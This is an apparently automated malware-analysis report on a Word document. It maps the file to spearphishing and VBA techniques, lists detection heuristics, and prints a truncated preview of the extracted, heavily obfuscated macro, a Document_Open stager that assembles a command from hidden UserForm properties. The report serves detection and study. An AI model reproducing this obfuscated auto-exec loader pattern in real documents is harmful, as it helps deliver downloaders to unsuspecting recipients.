Verdict: MALICIOUS (risk score: 302)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains heavily obfuscated VBA macros, including a Document_Open auto-exec macro and a UserForm hidden-property command stager. These techniques are commonly used to download and execute additional malicious payloads. The presence of VBA macros and the Document_Open trigger strongly suggest a spearphishing attachment delivery vector.
Heuristics (8)

- ClamAV: Doc.Downloader.Generic-7458347-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-7458347-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8163 bytes |

SHA-256 (macros.bas): 97ff7005bf67411ae80b73bd74731604946a00a62b49827448b04e1b56f12a65

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Qduyotdq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Olcvvgcpu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Erfejzkre
Dim Dlduyajcukgfy
For Hzfiilfkxfr = Hjgxqqnkmj To 0
Djdvufgxveubk = xPI
Vymgxsskm = CDbl(3)
Lxagphwkzlgkk = Tan(MyeW5A)
Tlvkhyqa = 4 - Tkghlyrzutixp
Eavtoncnwyg = (3 - Obuwlhvw)
Nmokpzsw = Xcxvhakrx
Fjqltylli = CDbl(6)
Oyhgacmnecj = Tan(Lezplwey)
Next
Dim Nchplaqdilmgt
Dim Sjusnjlrt
For Vvyymewflmy = Hjgxqqnkmj To 0
Whafluhgm = xPI
Zuobnbkopx = CDbl(3)
Fjziknittepwg = Tan(MyeW5A)
Gysgjlozs = 4 - Rkckqhrlvvmm
Dppveruevdpw = (3 - Kqkgrowyrjoi)
Okulvngvzeny = Oyutpwbelfu
Eyfhwnapljebd = CDbl(6)
Rgttoiktpus = Tan(Kyprnrcxuxrl)
Next
Dim Qxvjextynctt
Dim Wzhekhysw
For Vrobrauj = Hjgxqqnkmj To 0
Fiqrywxxq = xPI
Wstjpaoaux = CDbl(3)
Ijfewvbyk = Tan(MyeW5A)
Rrrnllau = 4 - Szzusczf
Heahitrb = (3 - Nydocsxndpt)
Hpkgkesbtbow = Jestzsrmtvk
Emctkejsrxnhw = CDbl(6)
Uxpspboikv = Tan(Duwovreopq)
Next
Fqxykeabcrdq
End Sub
Attribute VB_Name = "Imbflwcbhkqt"
Attribute VB_Base = "0{06FDBFF6-7190-4AF9-848C-69D137893021}{528A5CCE-B07B-4879-B91F-4EAA09471225}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Flabyzniii"
Function Jcfwcvqskbat()
Dim Alxlfeacqca
Dim Lhmrotqlyld
For Vneogbyzwy = Hjgxqqnkmj To 0
Ibsozsuxvdrhq = xPI
Jcczuauj = CDbl(3)
Cwyfroivvgrxx = Tan(MyeW5A)
Inprvxxaboxu = 4 - Vnsgqxwwseojl
Imfeglnerrbev = (3 - Tujzaszqgaw)
Kdmldascspsk = Bpptaybltz
Gjvydjzstoeq = CDbl(6)
Eoafqprjybqh = Tan(Tzjmyiuihtl)
Next
Gadacpyms = Qduyotdq.Olcvvgcpu
Dim Rsfknplcysudk
Dim Zdxiplvaky
For Fwxlujzhyp = Hjgxqqnkmj To 0
Socznjrrn = xPI
Vfiqkwsu = CDbl(3)
Gggahaukxm = Tan(MyeW5A)
Rqbjvmbhj = 4 - Tbfmspkgvkt
Vzfjxgpds = (3 - Rpbbfseclqm)
Nbvmgowy = Nwgsjcfmbnru
Jacfqasjadv = CDbl(6)
Dwdrpnwney = Tan(Zfdklktxhcfm)
Next
Ryltithjlio = Gadacpyms + Imbflwcbhkqt.Kfrbjzohmore + Imbflwcbhkqt.Gmryogxxbyy + Imbflwcbhkqt.Pofmtemuqhhg
Dim Kpiwdmfurbjda
Dim Utboewopep
For Neiqktkzffsym = Hjgxqqnkmj To 0
Bwdnwuphoqnhb = xPI
Egcosqjk = CDbl(3)
Pldobdbdwn = Tan(MyeW5A)
Cddyxtzw = 4 - Debmvyijrl
Hjltnnle = (3 - Hdezkutql)
Giymphdunvhwy = Mefmlieuxyhw
Qbzbfbangxf = CDbl(6)
Rnzgfcqipk = Tan(Pbnbohlqfwt)
Next
Posivhjaigymy = Ryltithjlio + Imbflwcbhkqt.Qatckaozy + Imbflwcbhkqt.Aytrcolpn
Dim Hvlcyeyql
Dim Msullgbxtr
For Qfucloymdix = Hjgxqqnkmj To 0
Gjnpuxtedy = xPI
Ydbwbsri = CDbl(3)
Wdcncnpheuob = Tan(MyeW5A)
Nhytflmhmzmlw = 4 - Pgyelmjn
Gowumnwyeiut = (3 - Thpqcaqq)
Ooqwtketr = Xqmalqnrhhviv
Wslhfpoq = CDbl(6)
Xaftdaczcwrdq = Tan(Dzsysgulpo)
Next
Jcfwcvqskbat = Bgbrzmhsoxtma + Posivhjaigymy + Bgbrzmhsoxtma
Dim Oubsnkjd
Dim Yajebrtdjcb
For Augzuwklfdgd = Hjgxqqnkmj To 0
Ieiclwncbm = xPI
Aidegzqzbxg = CDbl(3)
Hudswcajhky = Tan(MyeW5A)
Qbgxtujg = 4 - Iaxgnrik
Nebkkejpdsyed = (3 - Otdelbilsv)
Vnrzzzdnlavno = Ddedxrxyyfgm
Tjosfoclt = CDbl(6)
Zsxoxppbh = Tan(Osuhyottt)
... (truncated)